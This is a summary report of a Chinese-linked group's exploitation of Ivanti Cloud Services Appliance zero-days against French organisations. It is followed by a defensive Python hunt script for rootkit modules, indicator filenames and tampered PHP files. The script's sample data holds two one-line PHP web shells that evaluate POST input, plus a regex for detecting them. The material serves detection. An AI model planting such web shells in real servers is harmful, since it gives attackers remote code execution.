Full Report
The French cybersecurity agency on Tuesday revealed that a number of entities spanning governmental, telecommunications, media, finance, and transport sectors in the country were impacted by a malicious campaign undertaken by a Chinese hacking group by weaponizing several zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices. The campaign, detected at the beginning of
Analysis Summary
# Incident Report: Zero-Day Exploitation of Ivanti CSA by Chinese Hacking Group (Houken)
## Executive Summary
A sophisticated Chinese hacking group, codenamed **Houken** (likely linked to UNC5174), conducted a malicious campaign exploiting three zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices. The campaign impacted multiple sectors in France, including government, telecom, media, finance, and transport, leading to credential theft, rootkit installation, and potential data exfiltration, with some instances indicating deployment of cryptocurrency miners.
## Incident Details
- **Discovery Date:** Beginning of September 2024 (Campaign detection)
- **Incident Date:** Throughout 2024, with ANSSI reporting in July 2025.
- **Affected Organization:** Number of entities spanning governmental, telecommunications, media, finance, and transport sectors in France.
- **Sector:** Governmental, Telecommunications, Media, Finance, Transport.
- **Geography:** France (Primary focus of ANSSI report), potentially wider targeting in Southeast Asia (Gov/Education) and the West.
## Timeline of Events
### Initial Access
- **Date/Time:** Began at the beginning of September 2024 (Campaign start).
- **Vector:** Exploitation of three zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices: CVE-2024-8963, CVE-2024-9380, and CVE-2024-8190.
- **Details:** Attackers used the zero-days to gain a foothold and obtain credentials on targeted devices.
### Lateral Movement
- **Vector/Techniques:** Deployment of GOREVERSE (a variant of GoReShell) post-exploitation, followed by the use of the HTTP proxy tunneling tool `suo5` for command and control/movement.
### Data Exfiltration/Impact
- **Impact:** Initial access brokering, establishment of persistence via sophisticated means, and in at least one observed case, deployment of cryptocurrency miners, suggesting financial motivation alongside intelligence gathering.
- **Persistence Mechanism:** Attackers established persistence through three methods:
  1. Deploying PHP web shells (such as Behinder and neo-ReGeorg);
  2. Modifying existing PHP scripts on the appliance;
  3. Installing a rootkit (the `sysinitd.ko` kernel module) to achieve remote command execution with root privileges.
### Detection & Response
- **Detection:** Detected at the beginning of September 2024 by the French cybersecurity agency (ANSSI). The activity was later documented and publicly disclosed by ANSSI.
- **Response actions taken:** Not explicitly detailed in terms of remediation steps taken by victims, but indicators suggest awareness and ongoing investigation by state agencies.
## Attack Methodology
- **Initial Access:** Exploitation of Ivanti CSA zero-days (CVE-2024-8963, CVE-2024-9380, CVE-2024-8190).
- **Persistence:** PHP web shells (Behinder, neo-ReGeorg), user-space executable (`sysinitd`), and a kernel module rootkit (`sysinitd.ko`).
- **Privilege Escalation:** Achieved root privileges via the `sysinitd.ko` rootkit hijacking inbound TCP traffic.
- **Defense Evasion:** Use of a sophisticated rootkit (`sysinitd.ko`) and potentially attempting to patch the exploited vulnerabilities on compromised systems to prevent other actors from gaining access.
- **Credential Access:** Gained via exploitation of the Ivanti CSA vulnerabilities.
- **Discovery:** Activity was observed during UTC+8 (China Standard Time) working hours, suggesting reconnaissance aligned with Chinese operational hours.
- **Lateral Movement:** Utilized GOREVERSE and the `suo5` proxy tunneling tool.
- **Collection:** Implied collection for the purpose of selling access or intelligence data.
- **Exfiltration:** Not explicitly detailed, but the primary goal appears to be selling initial access or high-value intelligence.
- **Impact:** Establishment of persistent, high-privilege access; potential deployment of cryptocurrency miners.
## Impact Assessment
- **Financial:** Implied costs related to incident response and potential revenue loss from cryptocurrency mining operations (in at least one case).
- **Data Breach:** Unauthorized credential access; potential intelligence data gathered, although specific data types are not detailed.
- **Operational:** Disruption potential due to compromise of critical infrastructure sectors (Telecom, Finance, Transport).
- **Reputational:** Significant concern given that French governmental and critical infrastructure entities were targeted.
## Indicators of Compromise
(Note: IoCs are listed as named in the source report and are not defanged, because they are tool and file names used by the threat actor rather than network addresses or domains.)
- **Network indicators:** Use of commercial VPNs and dedicated servers for infrastructure. Use of HTTP proxy tunneling tool `suo5`.
- **File indicators:** PHP web shells (Behinder, neo-ReGeorg), GOREVERSE (GoReShell variant), `sysinitd` executable, `sysinitd.ko` (Linux kernel module rootkit).
- **Behavioral indicators:** Operation during UTC+8 time zone; patching of exploited vulnerabilities post-compromise.
## Response Actions
- **Containment measures:** Not specified, but initial steps would involve isolating compromised Ivanti CSA appliances and patching or replacing the devices affected by the zero-days.
- **Eradication steps:** Removal of all web shells, malware (GOREVERSE), and the `sysinitd` rootkit from affected systems.
- **Recovery actions:** Hardening of perimeter devices, credential rotation, and potentially full system rebuilds for devices infected with the kernel module.
## Lessons Learned
- **Key takeaways:** State-linked actors (or actors selling to them) are actively leveraging zero-day vulnerabilities in widely used appliances (like Ivanti CSA) as an initial access broker strategy. The use of sophisticated tools like kernel rootkits provides deep, high-privilege stealth.
- **What could have been done better:** Need for faster patching cycles for widely deployed perimeter appliances, especially when supply-chain vulnerabilities are involved. Proactive threat hunting for novel rootkits on critical infrastructure.
## Recommendations
- Immediately audit and patch all Ivanti CSA devices against CVE-2024-8963, CVE-2024-9380, and CVE-2024-8190.
- Implement mandatory segmentation for perimeter appliances like Ivanti CSAs, restricting access to only necessary internal networks.
- Enhance endpoint detection and response (EDR) capabilities to detect unusual kernel module loading or suspicious modification of core system files (PHP scripts).
- Review infrastructure for signs of the `sysinitd.ko` rootkit and associated Go-based malware families if similar IoT/Appliance targeting is suspected.
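The following hunt script is an added example, not code from ANSSI, Ivanti, or the original report. It implements the checks recommended above (unusual kernel modules, the `sysinitd`/`sysinitd.ko` artefacts, and tampered or dropped PHP scripts) against the three persistence methods described in the Timeline section. It runs over constructed inline data: a sample `lsmod` listing, a sample file inventory, and a hash baseline for PHP scripts. The `/opt/ivanti/csa/www` web root, the kernel version in the module path, and the PHP contents are all assumptions for illustration; on a real appliance you would feed it live `lsmod` output, a `find` listing, and a baseline taken from a clean image.

```python
"""Host-based hunt for the Houken persistence artefacts (added example)."""
import hashlib
import re

# Indicator names taken from the report: the rootkit kernel module and its
# user-space companion binary.
ROOTKIT_MODULE = "sysinitd"
SUSPICIOUS_FILENAMES = {"sysinitd", "sysinitd.ko"}

# Crude web-shell heuristic: dynamic code execution fed from request data.
WEBSHELL_PATTERN = re.compile(rb"\beval\s*\(|base64_decode\s*\(")

# Constructed sample of what `lsmod` might print on a compromised appliance.
SAMPLE_LSMOD = """\
Module                  Size  Used by
sysinitd               16384  0
xt_conntrack           16384  1
nf_conntrack          172032  2 xt_conntrack,nf_nat
"""

# Constructed sample file inventory (as produced by `find / -type f`).
# Paths and the kernel version directory are assumptions.
SAMPLE_FILE_LISTING = [
    "/usr/lib/modules/4.19.0/extra/sysinitd.ko",
    "/usr/bin/sysinitd",
    "/opt/ivanti/csa/www/index.php",
    "/opt/ivanti/csa/www/login.php",
    "/opt/ivanti/csa/www/cache.php",   # absent from baseline: possibly dropped
]

# Constructed PHP contents: one clean file, one modified script, one new file.
CLEAN_INDEX = b"<?php require 'app.php'; ?>"
CLEAN_LOGIN = b"<?php require 'auth.php'; ?>"
TAMPERED_LOGIN = b"<?php eval(base64_decode($_POST['x'])); ?>"
SAMPLE_PHP_CONTENTS = {
    "/opt/ivanti/csa/www/index.php": CLEAN_INDEX,
    "/opt/ivanti/csa/www/login.php": TAMPERED_LOGIN,
    "/opt/ivanti/csa/www/cache.php": b"<?php @eval($_POST['cmd']); ?>",
}
# Baseline hashes as they would be recorded from a clean appliance image.
BASELINE_SHA256 = {
    "/opt/ivanti/csa/www/index.php": hashlib.sha256(CLEAN_INDEX).hexdigest(),
    "/opt/ivanti/csa/www/login.php": hashlib.sha256(CLEAN_LOGIN).hexdigest(),
}


def loaded_modules(lsmod_text):
    """Parse `lsmod` output into a list of module names, skipping the header row."""
    names = []
    for line in lsmod_text.splitlines()[1:]:
        parts = line.split()
        if parts:
            names.append(parts[0])
    return names


def find_rootkit_module(lsmod_text):
    """Return loaded modules whose name matches the reported rootkit."""
    return [m for m in loaded_modules(lsmod_text) if m == ROOTKIT_MODULE]


def find_suspicious_files(paths):
    """Return inventory paths whose basename is one of the reported artefacts."""
    return [p for p in paths if p.rsplit("/", 1)[-1] in SUSPICIOUS_FILENAMES]


def looks_like_webshell(data):
    """True when the PHP source contains eval()/base64_decode() constructs."""
    return WEBSHELL_PATTERN.search(data) is not None


def find_modified_php(contents, baseline):
    """Map each PHP path to 'modified' (hash differs) or 'new' (not in baseline)."""
    findings = {}
    for path, data in contents.items():
        digest = hashlib.sha256(data).hexdigest()
        if path not in baseline:
            findings[path] = "new"
        elif baseline[path] != digest:
            findings[path] = "modified"
    return findings


def hunt(lsmod_text, paths, php_contents, baseline):
    """Run all three checks and return one report dictionary."""
    php = find_modified_php(php_contents, baseline)
    return {
        "rootkit_modules": find_rootkit_module(lsmod_text),
        "suspicious_files": find_suspicious_files(paths),
        "php_findings": php,
        "php_webshell_like": sorted(p for p in php if looks_like_webshell(php_contents[p])),
    }


if __name__ == "__main__":
    for key, value in hunt(SAMPLE_LSMOD, SAMPLE_FILE_LISTING,
                           SAMPLE_PHP_CONTENTS, BASELINE_SHA256).items():
        print(f"{key}: {value}")
```

The hash baseline is the important design choice: a rootkit that hides its own files can defeat `find` and `lsmod` on the live host, so the PHP comparison (and ideally the whole inventory) should be taken from an offline image of the appliance disk rather than from the running system.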